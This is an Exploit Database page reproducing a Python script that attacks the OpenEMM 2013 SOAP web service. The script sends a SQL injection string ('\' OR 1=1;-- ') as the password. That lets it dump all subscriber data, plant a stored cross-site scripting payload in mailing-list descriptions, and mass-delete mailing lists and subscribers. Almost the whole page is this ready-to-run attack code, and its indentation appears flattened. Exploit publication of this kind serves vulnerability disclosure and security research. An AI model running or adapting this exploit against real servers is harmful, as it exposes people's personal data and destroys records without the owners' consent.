OpenEMM-2013 8.10.380.hf13.0.066 – SOAP SQL Injection / Persistent Cross-Site Scripting

• Exploit Database
• 15 阅读

• 作者： drone
  日期： 2013-07-29
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/27187/

• import os
  import sys
  from SOAPpy import WSDL
  from argparse import ArgumentParser
  from re import sub
   
  # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
  # Date: 07/20/2013
  # Exploit Author: drone (@dronesec)
  # More information (and required WSDL file):
  # http://forelsec.blogspot.com/2013/07/openemm-2013-810380hf130066-soap-sql.html
  # Vendor Homepage: http://www.openemm.org/
  # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
  # Version: 2013 (8.10.380.hf13.0.066)
  # Tested on: Ubuntu 12.04
   
  """ Exploits a host of vulnerabilities discovered in OpenEMM.
   Required ws.wsdl file should be in local directory.
  """
  def run(options):
  """ run exploit
   """
  wsdl_file = "./ws.wsdl"
  sploit = "\\' OR 1=1;-- "
   
  _server = WSDL.Proxy(wsdl_file)
   
  if options.subscribers:
  # iterate until we get a null response
  idx = 1
  while True:
  ret = _server.getSubscriber("wsadmin", sploit, idx)
  if ret.paramValues == '':
  print '[!] Discovered %d subscribers'%(idx-1)
  break
   
  print ret.paramValues
  idx += 1
   
  elif options.mlist:
  try:
  print '[!] Description field vulnerable to stored xss!'
  description = raw_input('[!] Enter mlist description: ')
  except:
  description = ''
   
  ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
  if ret > 0: print '[!] Saved successfully'
  else: print '[!] Save unsuccessful'
   
  elif options.dmlist:
  print '[!] Deleting all mailing lists...'
  idx = 1
  while True:
  ret = _server.deleteMailinglist('wsadmin', sploit, idx)
  if ret == 0:
  print '[!] Deleted %d mailing lists.'%idx
  break
  idx += 1
   
  elif options.dsubs:
  print '[!] Deleting all subscribers...'
  idx = 1
  while True:
  ret = _server.deleteSubscriber('wsadmin', sploit, idx)
  if ret == 0:
  print '[!] Deleted %d subscribers.'%idx
  break
  idx += 1
   
  def parse_args():
  """ parse args and sub in the desired IP
   """
  parser = ArgumentParser()
  parser.add_argument('-i', help='server address', action='store',
  dest='host', required=True)
  parser.add_argument('-s', help='fetch all subscribers', action='store_true',
  dest='subscribers')
  parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
  dest='mlist')
  parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
  dest='dmlist')
  parser.add_argument('--ds', help='delete all subscribers', action='store_true',
  dest='dsubs')
   
  options = parser.parse_args()
  try:
  # sub in server address
  with open('ws.wsdl', 'r') as f:
  out = open('tmp.wsdl', 'w+')
  for line in f:
  line = sub('location="(.*?)"',
  'location="http://{0}:8080/emm_webservice"'.format(options.host),
  line)
  out.write(line)
  out.close()
  except IOError:
  print '[-] ws.wsdl not found'
  sys.exit(1)
   
  # replace ws.wsdl with temp one
  os.system('mv tmp.wsdl ws.wsdl')
  return options
   
  if __name__ == "__main__":
  options = parse_args()
  run(options)